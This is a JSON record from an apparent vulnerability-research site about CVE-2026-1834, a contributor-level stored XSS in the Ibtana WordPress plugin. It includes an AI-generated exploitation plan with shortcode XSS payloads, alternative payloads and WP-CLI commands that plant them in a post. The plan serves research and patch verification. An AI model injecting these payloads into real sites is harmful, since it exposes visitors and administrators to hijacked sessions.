[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fvMnC05q6ILa1EAhGOuXV9y7RY5MwXG81hZSSNV6OXP0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":29,"research_started_at":30,"research_completed_at":31,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":32},"CVE-2026-1834","ibtana-wordpress-website-builder-authenticated-contributor-stored-cross-site-scripting-via-shortcode-3","Ibtana - WordPress Website Builder \u003C= 1.2.5.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode","The Ibtana – WordPress Website Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ive' shortcode in all versions up to, and including, 1.2.5.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","ibtana-visual-editor",null,"\u003C=1.2.5.7","1.2.5.8","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)","2026-03-30 16:30:19","2026-03-31 05:28:52",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fb6a54d91-da79-43a3-affd-e8026e342d95?source=api-prod",1,[22,23,24],"ive-countdown.php","plugin.php","readme.txt","researched",false,3,"# Exploitation Research Plan: CVE-2026-1834 (Ibtana Visual Editor Stored XSS)\n\n## 1. Vulnerability Summary\nThe **Ibtana – WordPress Website Builder** plugin (up to 1.2.5.7) contains a Stored Cross-Site Scripting (XSS) vulnerability via the `[ive]` shortcode. The root cause is the failure to sanitize or escape user-supplied attributes within the `ive_shortcode` function (and its associated rendering callbacks) in `ive-countdown.php`. When a user with at least Contributor-level permissions embeds the `[ive]` shortcode with malicious attributes, the script is stored in the post content and executed in the context of any user (including Administrators) who views the post.\n\n## 2. Attack Vector Analysis\n- **Shortcode:** `[ive]`\n- **Vulnerable Attributes:** Likely `id`, `style`, `launchtarget`, or label attributes (`yearlabel`, `monthlabel`, etc.) as defined in `WP_Ivecountdown::register_ive_block`.\n- **Authentication:** Contributor or higher.\n- **Preconditions:** The plugin must be active. A post or page must be created containing the malicious shortcode.\n- **Endpoint:** Post\u002FPage creation\u002Fupdate (via WordPress admin or REST API).\n- **Trigger:** Viewing the published or previewed post on the frontend.\n\n## 3. Code Flow\n1.  **Registration:** In `ive-countdown.php`, the `__construct` method of `WP_Ivecountdown` registers the shortcode:\n    `add_shortcode('ive', array( $this, 'ive_shortcode') );`\n2.  **Shortcode Handling:** When WordPress parses `[ive]`, it calls the `ive_shortcode` method.\n3.  **Attribute Extraction:** The method uses `shortcode_atts()` to merge user-supplied attributes with defaults:\n    ```php\n    \u002F\u002F Inferred from register_block_type attributes in source:\n    'id' => array ('type' => 'string'),\n    'style' => array ('type' => 'string', 'default' => 'suzuki'),\n    'launchtarget' => array ('type' => 'string'),\n    'yearlabel' => array ('type' => 'string', 'default' => $this->options['yearlabel']),\n    ```\n4.  **Rendering (The Sink):** The attributes are used to build an HTML string. The vulnerability exists because the code likely concatenates these attributes directly into HTML tags without using `esc_attr()` or `esc_html()`.\n    - **Example Sink (Inferred):** `return '\u003Cdiv id=\"' . $atts['id'] . '\" class=\"' . $atts['style'] . '\">...\u003C\u002Fdiv>';`\n\n## 4. Nonce Acquisition Strategy\nSince the goal is to demonstrate **Stored XSS** via a shortcode, and the attacker is \"Authenticated (Contributor+)\", we can use **WP-CLI** to set up the payload. This bypasses the need to acquire a nonce for the HTTP request to save the post, focusing the PoC on the execution of the stored script.\n\nIf we were to perform the storage via the REST API or `admin-ajax.php`, we would:\n1.  Login as a Contributor.\n2.  Navigate to `wp-admin\u002Fpost-new.php`.\n3.  Extract the `_wpnonce` or `wpRestNonce` from the localized script data: `window.wpApiSettings.nonce`.\n\n**However**, for this specific exploit, we will use WP-CLI to inject the payload and then use the browser to verify the execution.\n\n## 5. Exploitation Strategy\n1.  **Initialize Environment:** Create a Contributor user and the target post using WP-CLI.\n2.  **Payload Selection:** We will target the `id` attribute to break out of the HTML attribute context.\n    - **Payload:** `\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`\n    - **Shortcode:** `[ive id='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']`\n3.  **Inject Payload:** Update a post with the shortcode.\n4.  **Trigger XSS:** Navigate to the post URL.\n5.  **Observe Execution:** Verify that the `\u003Cscript>` tag is rendered unescaped in the HTML source.\n\n## 6. Test Data Setup\n1.  **User Creation:**\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password123\n    ```\n2.  **Post Creation:**\n    ```bash\n    wp post create --post_type=post --post_status=publish --post_title=\"Countdown Test\" --post_author=attacker --post_content=\"[ive id='\\\" onmouseover=\\\"alert(1)\\\" style=\\\"display:block;width:100px;height:100px;background:red;\\\"' style='suzuki']\"\n    ```\n    *Note: Using `onmouseover` or `id='\">\u003Cscript>...'` depending on how the plugin wraps the attribute.*\n\n## 7. Expected Results\n- When viewing the post HTML source, the attribute should appear as:\n  `\u003Cdiv id=\"\" onmouseover=\"alert(1)\" style=\"display:block;...\" ...>`\n  OR\n  `\u003Cdiv id=\"\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\" ...>`\n- The `http_request` or `browser_navigate` should show the payload firing or the raw script tag in the response body.\n\n## 8. Verification Steps\n1.  **Check HTML Source:**\n    ```bash\n    # Use the browser_navigate and browser_eval to check for the presence of the script\n    # Or check if a specific element added by the script exists.\n    ```\n2.  **WP-CLI Verification:**\n    ```bash\n    wp post get \u003CPOST_ID> --field=post_content\n    ```\n    Confirm the content still contains the raw, unescaped payload.\n\n## 9. Alternative Approaches\nIf the `id` attribute is partially sanitized, try the following attributes based on the `register_ive_block` list in `ive-countdown.php`:\n- **Label attributes:** `[ive yearlabel='\u003C\u002Fp>\u003Cscript>alert(1)\u003C\u002Fscript>\u003Cp>']`\n- **Style attribute:** `[ive style='\">\u003Cimg src=x onerror=alert(1)>']`\n- **Launch Target:** `[ive launchtarget='\">\u003Cscript>alert(1)\u003C\u002Fscript>']`\n\nIf the shortcode requires specific timing attributes to render, add `timestr`:\n`[ive id='\">\u003Cscript>alert(1)\u003C\u002Fscript>' timestr='2028-01-01 00:00:00']`","gemini-3-flash-preview","2026-04-17 22:11:10","2026-04-17 22:11:38",{"type":33,"vulnerable_version":34,"fixed_version":11,"vulnerable_browse":35,"vulnerable_zip":36,"fixed_browse":37,"fixed_zip":38,"all_tags":39},"plugin","1.2.5.7","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fibtana-visual-editor\u002Ftags\u002F1.2.5.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fibtana-visual-editor.1.2.5.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fibtana-visual-editor\u002Ftags\u002F1.2.5.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fibtana-visual-editor.1.2.5.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fibtana-visual-editor\u002Ftags"]